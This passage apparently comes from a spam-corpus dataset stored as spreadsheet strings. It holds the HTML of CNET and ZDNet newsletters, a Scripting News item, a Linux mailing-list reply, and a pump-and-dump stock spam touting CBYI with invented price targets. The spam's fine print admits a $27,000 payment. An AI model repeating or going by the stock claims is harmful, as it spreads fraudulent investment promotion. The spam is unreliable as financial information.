         3. &lt;a href="http://clickthru.online.com/Click?q=8d-nbL1Q7no54XmsTkIiSupcptbPMPR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         4. &lt;a href="http://clickthru.online.com/Click?q=a2-6-M7QXZxTvbFipI9R0CGk_HtsonR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         5. &lt;a href="http://clickthru.online.com/Click?q=b7-FOgPQ8JxgOlolIL0NpbnpTbdL3eR" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
         &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=cc-h4fQQ0OqtVbcqIC7qeZDozn6f5yR"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href="http://clickthru.online.com/Click?q=e1-6RvNQxk2WvmDOAlPhsYK3Awi9qlR"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href="http://clickthru.online.com/Click?q=f6-QktIQMwrDgXcLAfYYRGOT9_Jmp4R" &gt;FREE for 30 days. Click
             here!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p&gt;&lt;a href="http://clickthru.online.com/Click?q=0b-0NI-INQ4dZR1DaTGftmZCtvxYhrR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;br&gt;
         &lt;!-- subscription management --&gt;
         &lt;font face="ms sans serif, geneva" size="-2"&gt; The e-mail address for your
         subscription is&amp;nbsp;qqqqqqqqqq-zdnet@spamassassin.taint.org&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=21-UPZOzEdWyZZDaQmwrqLf8L42jnb7L9RR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=36-wg7-IiI4oUHco2_MxvH3QainXQ4R" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=4b-k_l7IBUPPQwjTRaP9VA35c54JMcR"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href="http://clickthru.online.com/Click?q=60-oqItIsEAuhURJkELN8S_eSgFWVRR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=75-whwtIKUAIuvS8ED_rjups7LLZ5ZR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=8a-3y3dQXndaN53J2EO3Nt-tKChBwnR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=40-6Pp4Idn8DzxUeaceVXCHnpqL0wRR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=55-TAHaIKJ8Xqi8ylrqm86ccJ_2d2ZR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=6a-z_30IeWiUkrR9cqzceCGFySNP8dR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e426&amp;ISSUE=2002-07-11" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 .&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=81-z1Ka-xKW8d-4uEJI7_9st9QKU9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Jeremy Zawodny on life in Silicon Valley: "I came out here to
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:2:46:48PM
 Date: Wed, 25 Sep 2002 21:46:48 GMT
 Jeremy Zawodny[1] on life in Silicon Valley: "I came out here to work at a 
 company that has since forgotten how to innovate and take risks. Yippie."
 [1] http://jeremy.zawodny.com/blog/archives/000188.html#000188
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] stupid pics of the day
</t>
  </si>
  <si>
    <t xml:space="preserve">John P. Looney wrote:
 &gt; On Thu, Aug 01, 2002 at 04:03:07PM +0100, Padraig Brady mentioned:
 &gt; 
 &gt;&gt;Some local Irish wildlife
 &gt;&gt;
 &gt;&gt;http://www.iol.ie/~padraiga/pics/wild1.jpg
 &gt;&gt;http://www.iol.ie/~padraiga/pics/wild2.jpg
 &gt;&gt;
 &gt;&gt;was I bored or what?
 &gt; 
 &gt;  Most likely.
 &gt; 
 &gt;  Hey...is that one of my nice wai-yip stuffed ones ?
 Ah, I new I had one extra.
 Ransom is a pint.
 Pdraig.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: THE BEST INVESTMENTS
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;&lt;/TITLE&gt;&lt;META http-equiv=3D=22Content-Type=22 content=3D=22=
 text/html; charset=3Dwindows-1252=22&gt;&lt;STYLE&gt;A:link =7BTEX-DECORATION: none=7D=
 A:active =7BTEXT-DECORATION: none=7DA:visited =7BTEXT-DECORATION: none=7DA:h=
 over =7BCOLOR: =230033ff; TEXT-DECORATION: underline=7D&lt;/STYLE&gt;&lt;META conten=
 t=3D=22MSHTML 6.00.2713.1100=22 name=3D=22GENERATOR=22&gt;&lt;/HEAD&gt;
 &lt;BODY text=3D=22=23000000=22 vLink=3D=22=230033ff=22 link=3D=22=230033ff=22 bgColor=
 =3D=22=23CCCC99=22&gt;&lt;TABLE borderColor=3D=22=23660000=22 cellSpacing=3D=220=22 cellP=
 adding=3D=220=22 border=3D=220=22 width=3D=22100%=22&gt;&lt;TR&gt;&lt;TD bgColor=3D=22=23CCCC99=22=
  valign=3D=22top=22 colspan=3D=222=22 height=3D=2227=22&gt;
 &lt;font size=3D=226=22 face=3D=22Arial, Helvetica, sans-serif=22 color=3D=22=23660=
 000=22&gt;
 &lt;b&gt;OTC&lt;/b&gt;&lt;/font&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD height=3D=222=22 bgcolor=3D=22=236a694f=22&gt;=
 &lt;font size=3D=225=22 face=3D=22Times New Roman, Times, serif=22 color=3D=22=23FF=
 FFFF=22&gt;
 &lt;b&gt;&amp;nbsp;Newsletter&lt;/b&gt;&lt;/font&gt;&lt;/TD&gt;&lt;TD height=3D=222=22 bgcolor=3D=22=236a694=
 f=22&gt;&lt;div align=3D=22right=22&gt;&lt;font color=3D=22=23FFFFFF=22&gt;
 &lt;b&gt;Discover Tomorrow's Winners&amp;nbsp;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD =
 height=3D=2225=22 colspan=3D=222=22 bgcolor=3D=22=23CCCC99=22&gt;&lt;table width=3D=22100%=
 =22 border=3D=220=22 cellspacing=3D=220=22 cellpadding=3D=225=22&gt;&lt;tr&gt;&lt;td valign=3D=22=
 middle=22 height=3D=222=22&gt;&lt;table width=3D=22300=22 border=3D=221=22 cellspacing=3D=
 =220=22 cellpadding=3D=220=22 bordercolor=3D=22=23660000=22 bgcolor=3D=22=23EBEDCB=22=
  height=3D=225=22 align=3D=22center=22&gt;&lt;tr&gt;&lt;td valign=3D=22middle=22 height=3D=228=22=
 &gt;&lt;div align=3D=22center=22&gt;
 &lt;font face=3D=22Arial, Helvetica, sans-serif=22 color=3D=22=23660000=22 size=3D=
 =225=22&gt;
 &lt;b&gt;For Immediate Release&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;t=
 r&gt;&lt;td&gt;&lt;table width=3D=22100%=22 border=3D=221=22 cellspacing=3D=220=22 cellpaddin=
 g=3D=228=22 align=3D=22center=22 bgcolor=3D=22=23fafaf5=22 bordercolor=3D=22=23660000=
 =22&gt;&lt;tr&gt;&lt;td bgcolor=3D=22=23fafaf5=22 valign=3D=22top=22 height=3D=22453=22&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;Cal-Bay (Stock Symbol: CBYI)&lt;/b&gt;
 &lt;br&gt;Watch for analyst =22Strong Buy Recommendations=22 and several adviso=
 ry newsletters picking CBYI.  CBYI has filed to be traded on the OTCBB, =
 share prices historically INCREASE when companies get listed on this lar=
 ger trading exchange. CBYI is trading around 25 cents and should skyrock=
 et to =242.66 - =243.25 a share in the near future.&lt;br&gt;
 &lt;b&gt;&lt;i&gt;Put CBYI on your watch list, acquire a position TODAY.&lt;/i&gt;&lt;/b&gt;&lt;/f=
 ont&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;REASONS TO INVEST IN CBYI&lt;/b&gt;&lt;/font&gt;
 &lt;li&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;=
 A profitable company and is on track to beat ALL earnings estimates=21&lt;/=
 font&gt;
 &lt;li&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;=
 One of the FASTEST growing distributors in environmental &amp;amp; safety e=
 quipment instruments.&lt;/font&gt;
 &lt;li&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 color=3D=22=2300=
 0000=22 size=3D=22-1=22&gt;
 Excellent management team, several EXCLUSIVE contracts.  IMPRESSIVE cli=
 ent list including the U.S. Air Force, Anheuser-Busch, Chevron Refining =
 and Mitsubishi Heavy Industries, GE-Energy &amp;amp; Environmental Research.=
 &lt;/font&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;RAPIDLY GROWING INDUSTRY&lt;/b&gt;
 &lt;br&gt;Industry revenues exceed =24900 million, estimates indicate that the=
 re could be as much as =2425 billion from =22smell technology=22 by the end=
  of 2003.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;=21=21=21=21=21CONGRATULATIONS=21=21=21=21=21&lt;/b&gt;&lt;br&gt;Our last recommendation t=
 o buy ORBT at =241.29 rallied and is holding steady at =243.50=21 Congratul=
 ations to all our subscribers that took advantage of this recommendation=
 .&lt;/font&gt;&lt;/p&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;p align=3D=22center=22&gt;&lt;font size=3D=22-1=22 face=3D=22Verdana, Arial, Helveti=
 ca, sans-serif=22 color=3D=22=23660000=22&gt;
 ALL removes HONORED. Please allow 7 days to be removed and send ALL add=
 resses to:
 &lt;font color=3D=23ff0000&gt;
 &lt;a href=3D=22mailto:goneforgood=40btamail.net.cn=22&gt;GoneForGood=40btamail.ne=
 t.cn
 &lt;/a&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table width=3D=22100%=22 border=3D=221=22 c=
 ellspacing=3D=220=22 cellpadding=3D=220=22 bordercolor=3D=22=23660000=22&gt;&lt;tr&gt;&lt;td b=
 gcolor=3D=22=23660000=22 height=3D=228=22&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor=3D=22=23=
 FFFFCC=22&gt;&lt;table width=3D=22100%=22 border=3D=220=22 cellspacing=3D=220=22 cellpad=
 ding=3D=224=22&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font size=3D=22-2=22 face=3D=22Verdana, Arial, Helvetica, sans-serif=22&gt;
 Certain statements contained in this news release may be forward-lookin=
 g statements within the meaning of The Private Securities Litigation Ref=
 orm Act of 1995. These statements may be identified by such terms as =22e=
 xpect=22, =22believe=22, =22may=22, =22will=22, and =22intend=22 or similar terms=
 . We are NOT a registered investment advisor or a broker dealer. This is=
  NOT an offer to buy or sell securities. No recommendation that the secu=
 rities of the companies profiled should be purchased, sold or held by in=
 dividuals or entities that learn of the profiled companies. We were paid=
  =2427,000 in cash by a third party to publish this report. Investing in =
 companies profiled is high-risk and use of this information is for readi=
 ng purposes only. If anyone decides to act as an investor, then it will =
 be that investor's sole risk. Investors are advised NOT to invest withou=
 t the proper advisement from an attorney or a registered financial broke=
 r. Do not rely solely on the information presented, do additional indepe=
 ndent research to form your own opinion and decision regarding investing=
  in the profiled companies. Be advised that the purchase of such high-ri=
 sk securities may result in the loss of your entire investment.  Not int=
 ended for recipients or residents of CA,CO,CT,DE,ID, IL,IA,LA,MO,NV,NC,O=
 K,OH,PA,RI,TN,VA,WA,WV,WI. Void where prohibited.  The owners of this pu=
 blication may already own free trading shares in CBYI and may immediatel=
 y sell all or a portion of these shares into the open market at or about=
  the time this report is published.  Factual statements are made as of t=
 he date stated and are subject to change without notice.
 &lt;br&gt;Copyright c 2001&lt;/font&gt;&lt;hr width=3D=22100%=22 noShade size=3D=221=22&gt;&lt;/td=
 &gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD cols=
 pan=3D=222=22 height=3D=2231=22&gt;&lt;table width=3D=22100%=22 border=3D=220=22 cellspaci=
 ng=3D=220=22 cellpadding=3D=224=22&gt;&lt;tr&gt;&lt;td width=3D=2287%=22 height=3D=2221=22&gt;&lt;div =
 align=3D=22right=22&gt;
 &lt;font color=3D=22=23666666=22&gt;&amp;equiv;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;&lt;td width=3D=227%=22 he=
 ight=3D=2221=22&gt;
 &lt;font face=3D=22Arial, Helvetica, sans-serif=22 size=3D=226=22 color=3D=22=23FFF=
 FFF=22&gt;
 OTC&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;td width=3D=226%=22 height=3D=2221=22&gt;&lt;div align=3D=22le=
 ft=22&gt;
 &lt;font color=3D=22=23666666=22&gt;&amp;equiv;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/TD&gt;&lt;/=
 TR&gt;&lt;/TABLE&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ****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</si>
  <si>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=3Db4-aJlbQ6Z1xDZVox8qJzDxDXozLCyR" &gt;&lt;img src=3D"http://www.zdnet.com/graph=
 ics/newsletters/hd_anchor.gif" width=3D"440" height=3D"60" border=3D"0"  al=
 t=3D"AnchorDesk Daily"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D160 align=3Dcenter valign=3Dtop rowspan=3D2 bgcolor=3D"#ffffff"=
 &gt;
    &lt;br&gt;
         &lt;!--tower --&gt;
       &lt;iframe src=3D"http://www.zdnet.com/include/ads/ifc/RGROUP=3D2766" sc=
 rolling=3D"no" frameborder=3D"0" hspace=3D"0" vspace=3D"0" height=3D"600" w=
 idth=3D"160" marginheight=3D"0" marginwidth=3D"0"&gt;
 &lt;script language=3D"JavaScript" src=3D"http://www.zdnet.com/include/ads/js/=
 RGROUP=3D2766"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;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href=3D"http://clickthru.online.com/Click?q=3Dc9-3OZLQpg=
 kUN7mSfSjg0SxiPZvH6lR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Veritas CEO Gary Bloom speaks out at Tech Update.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt; &lt;img s=
 rc=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=3D"6"&gt;&lt;br=
 &gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dde-7tpkQMW=
 aOA_r5o6tTbDS-BJjho4R" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Check out these personal laser printer picks at ZDNet Reviews.&lt;/b&gt;&lt;/font&gt;&lt;/=
 a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" hei=
 ght=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Df3-LjwgQJO=
 wjRBoIYxCs3CyJqsjeorR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 See how WAP works and how you should use it at Builder.com.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;=
 br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=
 =3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D08-IFoQIRj=
 FUrr50LHg3F-erCpGY9iR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Need a new job? Find one today in ZDNet's Career Center.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt;=
  &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=3D=
 "6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D1d-6KTjIGQ=
 F77BfQD3Rl28NRQSnqQPR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 CIOs talk out about the future of IT at CNET News.com.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt; &lt;=
 img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=3D"6=
 "&gt;&lt;br&gt;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&gt;FRI JUL 12,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ck?q=3D32-Gx5IIrQ6jNYa9RqDFWVhZSgRXBnR" &gt;&lt;b&gt;New Sony Vaio: When small becom=
 es TOO small&lt;/A&gt;&lt;/B&gt;&lt;/font&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphics/cl=
 ear.gif" width=3D"1" height=3D"4"&gt;&lt;br&gt;
                 Sometimes hardware vendors take this whole smaller-is-bette=
 r thing way, way too far. Witness the Sony Vaio U1. This tiny PC--so far fo=
 r sale only in Asia--is too small for a jumbo-sized Texan like me to use. B=
 ut, dang, it's cute!&lt;p&gt;
         =20
        =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D48-ggFbIdB=
 sy9f6V3UXl_kj2ZBSJuRR" &gt;&lt;b&gt;NOTE: Why we're changing our publishing schedule=
 &lt;/b&gt; &lt;/a&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage=
 /b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
        =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D5d-JN-bIK0=
 sj9A1OwEobvZm5yGKIaZR" &gt;&lt;b&gt;PLUS: AnchorDesk Radio: The changing geography o=
 f the Net&lt;/b&gt; &lt;/a&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/=
 frontpage/b.gif"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href=3D"http://clickthru.online.com/Click?q=3D72-R8PHIPUf02siCzw=
 rqMtNXjoCKqdR" &gt;New security holes found in Outlook, IE... MS networks your=
  home &lt;/a&gt;&lt;p&gt;
          =20
        =20
                =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3D87-izDOQ8naPmmP-hF=
 eplrQ8kasp4eR" &gt;Toshiba's new Pocket PC: Beautiful inside and out&lt;/a&gt;&lt;p&gt;
                =20
                =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3D9c-xt6pQanyk_ysloA=
 lXdIl9Oi-UiyR" &gt;3 tools for viewing any file format under the sun&lt;/a&gt;&lt;p&gt;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
 g=3D"0" border=3D"0" bgcolor=3D"#ffffff"&gt;    &lt;tr bgcolor=3D"#999999"&gt;&lt;td co=
 lspan=3D"7" height=3D"15"&gt;&lt;font face=3D"ms sans serif, geneva" color=3D"#ff=
 ffff" size=3D"-2"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fron=
 tpage/b.gif" height=3D1 width=3D3&gt;&lt;b&gt;Crucial Clicks: More from ZDNet&lt;/b&gt;&lt;/f=
 ont&gt;&lt;/td&gt;&lt;/tr&gt;    &lt;tr&gt;    &lt;td bgcolor=3D"#999999" rowspan=3D"3"&gt;&lt;img src=3D=
 "http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D1 width=
 =3D1&gt;&lt;/td&gt;    &lt;td rowspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/a=
 nchordesk/frontpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt;    &lt;td colspan=3D"3"&gt;=
 &lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" heigh=
 t=3D5 width=3D1&gt;&lt;/td&gt;    &lt;td rowspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com=
 /graphics/anchordesk/frontpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt;    &lt;td bgc=
 olor=3D"#999999" rowspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/an=
 chordesk/frontpage/b.gif" height=3D1 width=3D1&gt;&lt;/td&gt;    &lt;/tr&gt;    &lt;tr valign=
 =3D"top"&gt;    &lt;td width=3D"100%"&gt;          &lt;table width=3D"100%"  cellpaddin=
 g=3D"0" cellspacing=3D"0" border=3D"0"&gt;        &lt;tr&gt;&lt;td colspan=3D"3"&gt;&lt;font =
 face=3D"verdana, geneva" color=3D"#333333" size=3D"-2"&gt;&lt;b&gt;CD-RW drives&lt;/b&gt;&lt;=
 /font&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/=
 b.gif" height=3D3 width=3D1&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;        &lt;tr valign=3D"top"&gt;    =
    &lt;td width=3D"85"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Db1-Yjx=
 JQ-0dz-PqPYWr9i_f_B0NLnlR" &gt;&lt;img src=3D"http://www.zdnet.com/products/graph=
 ics/070802cdfirewire.jpg" width=3D"85" height=3D"110" border=3D"0" alt=3D""=
  /&gt;&lt;/a&gt;&lt;/td&gt;       &lt;td width=3D"5"&gt;&lt;img src=3D"http://www.zdnet.com/graphic=
 s/anchordesk/frontpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt;        &lt;td width=
 =3D"100%"&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;a href=3D"http://cli=
 ckthru.online.com/Click?q=3Dc6-URF9QMLKgZZ5uzgWdT_pfmeDx04R" style=3D"text-=
 decoration:none"&gt;&lt;b&gt;Flashy, fast FireWire CD-RW drives&lt;/b&gt;&lt;/a&gt; &lt;br /&gt;Need t=
 o rip some audio while you're on the road? Gotta back up a PC or a Mac? ZDN=
 et reviewers say: Check out these speedy, portable CD burners.&lt;/font&gt;&lt;/td&gt; =
     &lt;/tr&gt;           &lt;tr&gt;&lt;td colspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/=
 graphics/anchordesk/frontpage/b.gif" height=3D3 width=3D1&gt;&lt;br /&gt;&lt;img src=3D=
 "http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width=3D"8" heigh=
 t=3D"10" border=3D"0" alt=3D"" /&gt;&lt;font face=3D"arial, helvetica" size=3D"-1=
 "&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Ddb-rmY9QJEK6LDesNkvpmtTw=
 xp6DtrR" style=3D"text-decoration:none"&gt;Read reviews&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;  =
       &lt;/table&gt;    &lt;/td&gt;    &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/an=
 chordesk/frontpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt;    &lt;td width=3D"180"&gt; =
         &lt;table cellpadding=3D"0" cellspacing=3D"0" width=3D"180" border=3D"=
 0" bgcolor=3D"#eeeeee"&gt;        &lt;tr bgcolor=3D"#999999"&gt;&lt;td colspan=3D"3" he=
 ight=3D"15"&gt;&lt;font face=3D"ms sans serif, geneva" color=3D"#ffffff" size=3D"=
 -2"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" h=
 eight=3D1 width=3D3&gt;Most Popular Products&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;      &lt;tr&gt;       =
      &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.g=
 if" width=3D"10" height=3D"1" alt=3D"" border=3D"0" /&gt;&lt;/td&gt;         &lt;td&gt;&lt;fo=
 nt face=3D"ms sans serif, geneva" size=3D"-2"&gt;&lt;img src=3D"http://www.zdnet.=
 com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"5" alt=3D"" =
 border=3D"0" /&gt;&lt;br /&gt;            &lt;b&gt;Removable Storage&lt;/b&gt;&lt;br /&gt;&lt;img src=3D"=
 http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" heigh=
 t=3D"7" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;       &lt;b&gt;1&lt;/b&gt;. &lt;a href=3D"http://cl=
 ickthru.online.com/Click?q=3Df0-nv_DQWg4K4Npqud2fqfAgMcXeaiR" style=3D"text=
 -decoration:none"&gt;IBM Deskstar 120GXP&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet=
 .com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=3D""=
  border=3D"0" /&gt;&lt;br /&gt;          &lt;b&gt;2&lt;/b&gt;. &lt;a href=3D"http://clickthru.onlin=
 e.com/Click?q=3D06-fP6uI482ubTvT6omap_vCgSyiL4R" style=3D"text-decoration:n=
 one"&gt;HP DVD-Writer DVD100i&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphi=
 cs/anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=3D"" border=3D"=
 0" /&gt;&lt;br /&gt;          &lt;b&gt;3&lt;/b&gt;. &lt;a href=3D"http://clickthru.online.com/Click=
 ?q=3D1b-wAnhI3N2I67fteNQ1U5MauO37xrR" style=3D"text-decoration:none"&gt;Lite-O=
 n 40X/12X/48X EIDE&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/ancho=
 rdesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=3D"" border=3D"0" /&gt;&lt;br=
  /&gt;       &lt;b&gt;4&lt;/b&gt;. &lt;a href=3D"http://clickthru.online.com/Click?q=3D30-u8N=
 EIRrWEtxZz7A8IeOdSKzjX1iR" style=3D"text-decoration:none"&gt;Pioneer DVR-A04&lt;/=
 a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gi=
 f" width=3D"1" height=3D"3" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;      &lt;b&gt;5&lt;/b&gt;. &lt;=
 a href=3D"http://clickthru.online.com/Click?q=3D45-fNkJIKB680KVZax-EDvznhjo=
 nlZR" style=3D"text-decoration:none"&gt;Western Digital Caviar WD1200JB&lt;/a&gt;&lt;br=
  /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" wi=
 dth=3D"1" height=3D"6" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;      &lt;img src=3D"http=
 ://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width=3D"8" height=3D"=
 10" border=3D"0" alt=3D"" /&gt;&lt;b&gt;&lt;a href=3D"http://clickthru.online.com/Click=
 ?q=3D5a-ahD1IP0IMbr7JGw24YOLpk6Td6dR" style=3D"text-decoration:none"&gt;More p=
